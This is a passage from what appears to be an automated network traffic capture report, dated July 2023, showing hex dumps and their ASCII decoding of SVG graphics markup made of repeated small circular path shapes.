                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8676INData Raw: 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 31 35 2c 33 32 30 2e 36 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20
                                                                                                                                                                                                                                                                          Data Ascii: -4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M688.15,320.61a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8692INData Raw: 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 39 2c 33 38 31 2e 36 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2c 33 37 33 61 32 2e 31 36
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M722.89,381.68a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M723,373a2.16
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8708INData Raw: 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 36 32 2c 34 34 32 2e 37 36 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 37 2c 34 33 34 2e 30 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c
                                                                                                                                                                                                                                                                          Data Ascii: ,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M757.62,442.76a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M757.7,434.08a2.15,2.15,0,0,1-1.09,2.75,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8724INData Raw: 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 38 2c 32 35 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: 2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M785.78,252a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8740INData Raw: 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 34 34 2c 33 32 31 2e 37 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 35 31 2c 33 31 33 2e 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37
                                                                                                                                                                                                                                                                          Data Ascii: ath class="cls-9" d="M820.44,321.78a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M820.51,313.1a2.15,2.15,0,0,1-1.09,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.7
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8756INData Raw: 22 4d 38 35 35 2e 31 37 2c 33 38 32 2e 38 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 35 2e 32 35 2c 33 37 34 2e 31 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: "M855.17,382.86a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M855.25,374.18a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8772INData Raw: 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 39 30 2c 34 33 35 2e 32 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74
                                                                                                                                                                                                                                                                          Data Ascii: .1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.2,2.64,2.64,0,0,1,0,3.57"/><path class="cls-9" d="M890,435.25a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.63,2.63,0,0,1,0,3.57"/><pat
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8788INData Raw: 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 38 2e 30 36 2c 32 35 33 2e 32 31 41 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2c 39 31 37 2c 32 35 36 61 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33
                                                                                                                                                                                                                                                                          Data Ascii: 0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M918.06,253.21A2.15,2.15,0,0,1,917,256a3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8804INData Raw: 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 35 32 2e 38 2c 33 31 34 2e 32 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M952.8,314.28a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8820INData Raw: 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 35 38 2c 32 35 31 2e 36 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 32 38 2c 32 34 32 2e 38 35 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: 2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M59.58,251.63a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M59.28,242.85a2.18,2.18,0,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8836INData Raw: 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 39 37 2c 33 30 33 2e 30 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d
                                                                                                                                                                                                                                                                          Data Ascii: 8,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M97,303.09a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8852INData Raw: 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 35 36 2c 31 31 37 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 32 36 2c 31 30 39 2e 30 35 61 32 2e 31 38 2c 32 2e 31 38 2c
                                                                                                                                                                                                                                                                          Data Ascii: 6,2.86,2.86,0,0,1,3.67,0,2.67,2.67,0,0,1,.19,3.61"/><path class="cls-7" d="M117.56,117.83a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M117.26,109.05a2.18,2.18,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8868INData Raw: 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2e 33 31 2c 31 37 38 2e 30 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2c 31
                                                                                                                                                                                                                                                                          Data Ascii: 1.2,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155.31,178.08a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.84,2.84,0,0,1,3.66,0,2.67,2.67,0,0,1,.2,3.62"/><path class="cls-7" d="M155,1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8884INData Raw: 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 33 2e 30 37 2c 32 33 38 2e 33 32 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 32 2e 37 37 2c 32 32 39 2e 35 34 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c
                                                                                                                                                                                                                                                                          Data Ascii: 0,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M193.07,238.32a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M192.77,229.54a2.17,2.17,0,0,1-1,2.83,3.18,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8900INData Raw: 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 38 33 2c 32 39 38 2e 35 37 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 35
                                                                                                                                                                                                                                                                          Data Ascii: 1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M230.83,298.57a2.19,2.19,0,0,1-1,2.83,3.2,3.2,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M230.5
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8916INData Raw: 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 35 31 2e 33 35 2c 31 31 33 2e 33 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                          Data Ascii: 3-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M251.35,113.31a2.17,2.17,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M
                                                                                                                                                                                                                                                                          2023-07-05 06:07:49 UTC8932INData Raw: 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 38 39 2e 31 2c 31 37 33 2e 35 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                                          Data Ascii: 1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M289.1,173.55a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.66,2.66,0,0,1,.2,3.61"/><path class="
